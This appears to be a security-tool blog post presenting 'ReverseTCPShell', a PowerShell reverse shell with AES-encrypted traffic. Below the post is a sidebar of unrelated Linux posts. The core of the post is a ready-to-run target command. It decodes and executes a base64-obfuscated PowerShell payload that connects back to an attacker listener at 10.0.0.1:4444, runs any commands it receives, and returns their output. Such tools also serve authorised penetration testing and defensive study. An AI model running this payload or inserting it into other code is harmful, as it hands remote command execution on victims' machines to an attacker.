ReverseTCPShell : PowerShell ReverseTCP Shell, Client & Server

ReverseTCPShell is a tool for Reverse Encrypted (AES 256-bit) Shell over TCP using PowerShell SecureString.

  • Attacker (C2-Server Listener):

PS> .\ReverseTCP.ps1

  • Target (Client):

CMD> ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEkAWABKADMAKwBBAE0AYgAzADIASgBXAEIAZgAyADkAdQBkAGoAcgBqAHYAeQBkAHUALwB4AFgARgBFAHUAYgB0AHQAVABhAHYAWAAwAGEAbwA9ACIAOwAkAEsAZQB5AD0AKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgBhAHMAZQA2ADQAKQApADsAJABDAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAwAC4AMAAuADEAJwAsADQANAA0ADQAKQA7ACQAUwB0AHIAZQBhAG0APQAkAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAQgB5AHQAZQBzAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABSAGUAYQBkAD0AJABTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAeQB0AGUAcwAsACAAMAAsACAAJABCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABDAG8AbQBtAGEAbgBkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB5AHQAZQBzACwAMAAsACAAJABSAGUAYQBkACkAOwAkAEQAZQBDAG8AZABlAD0AJABDAG8AbQBtAGEAbgBkACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQATwB1AHQAUAB1AHQAPQAoAEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAGkAbgBnAEEAdQB0AG8AKABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwBUAG8AQgBTAFQAUgAoACQARABlAEMAbwBkAGUAKQApACkAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQARQBuAEMAbwBkAGUAPQBDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABPAHUAdABQAHUAdAAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQAUwBlAG4AZABCAHkAdABlAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAEUAbgBDAG8AZABlACkAOwAkAFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABTAGUAbgBkAEIAeQB0AGUALAAwACwAJABTAGUAbgBkAEIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABTAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsARQB4AGkAdAA=}))));Exit | PowerShell –

Also Read – Metabigor : Command Line Search Engines Without Any API Key

PoC:

  • Payload Execution:
  • Analyze Encrypted Traffic:
Download
R K

Share
Published by
R K
Tags: ClientPowerShellReverseTCPReverseTCPShellServerShell
6 years ago

Recent Posts

WhatsMyName App – Find Anyone Across 640+ Platforms

Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…

5 days ago

Analyzing Directory Size Linux Tools Explained

Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…

5 days ago

Understanding Disk Usage with du Command

Efficient disk space management is vital in Linux, especially for system administrators who manage servers…

5 days ago

How to Check Directory Size in Linux

Knowing how to check directory sizes in Linux is essential for managing disk space and…

5 days ago

Essential Commands for Linux User Listing

Managing user accounts is a core responsibility for any Linux administrator. Whether you’re securing a…

5 days ago

Command-Line Techniques for Listing Linux Users

Linux offers powerful command-line tools for system administrators to view and manage user accounts. Knowing…

6 days ago